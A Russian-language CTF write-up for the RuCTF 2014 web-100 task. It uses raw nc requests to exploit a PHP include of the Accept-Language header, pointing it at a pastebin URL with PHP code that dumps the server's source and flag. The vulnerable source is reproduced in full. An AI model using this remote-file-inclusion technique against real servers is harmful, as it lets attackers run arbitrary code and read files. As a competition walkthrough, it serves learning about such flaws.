RuCTF Quals 2014 web-100: php

Задача:
Найдите ключ.

Решение:
Исходя из надписи “Language was detect automatically :)” в футере, понимаем, что нужно копаться где-то в районе Accept-Language.
Пробуем

➜ ~ nc w1.quals.ructf.org 80
GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: index.php

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:18:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: en

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:19:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

65c

<!doctype html>
<html>
<head>
<style type="text/css">
pre { width: 640px; white-space: normal; text-align: justify;};
</style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
<style type="text/css">
pre { width: 640px; white-space: normal; text-align: justify;};
</style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>

....

Т.е. файл открывается при помощи include. Пробуем remote include при помощи заливки простенького <?php echo file_get_contents(‘index.php’); ?> на pastebin.

➜  ~  nc w1.quals.ructf.org 80
GET / HTTP/1.1
Host: w1.quals.ructf.org
Accept-Language: http://pastebin.com/raw.php?i=5LYkba4c

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Mon, 24 Mar 2014 13:24:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u7

357
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<?php
  header('Content-Type: text/html; charset=utf-8');
  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
  $ok   = 0;
  foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    $l = explode(';', $s)[0];
    if (include $l) {
      $ok = 1;
      break;
    }
  }
  if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
  } else {
    echo 'Language was detect automatically :)';
  }
?>
<center>
</body>
</html>
Language was detect automatically :)<center>
</body>
</html>

0

Обращаем внимание на

  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';

profit ;)